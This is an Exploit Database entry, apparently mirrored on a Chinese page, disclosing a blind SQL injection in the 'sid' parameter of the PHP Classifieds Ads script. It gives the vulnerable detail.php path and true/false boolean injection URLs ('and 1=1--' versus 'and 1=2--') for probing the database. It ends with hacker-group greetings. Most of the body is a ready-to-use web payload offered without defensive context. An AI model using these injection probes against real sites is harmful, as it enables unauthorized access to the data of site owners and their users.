PHP Classifieds ADS – ‘sid’ Blind SQL Injection

• Exploit Database
• 11 阅读

• 作者： h4ck3r
  日期： 2010-09-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14891/

• [~] Title:PHP CLASSIFIEDS ADS
  [~] Price: $49
  [~] Link : http://www.sellatsite.com/sellatsite/phpclass.asp
  [~] Author:BorN To K!LL - h4ck3r
  [~] 3xploit:
  
  /detail.php?sid=[Blind-Injection]
  
  [~] 3xample:
  
  http://www.example.com/classi/detail.php?sid=80 and 1=1-- // True ,,
  
  http://www.example.com/classi/detail.php?sid=80 and 1=2--// False ,,
  
  [~] Greetings:
  
  string Greetings[x] = ("Dr.2" , "Q8 H4x0r" , "AsbMay's Group" , "darkc0de team" , "and all my friends");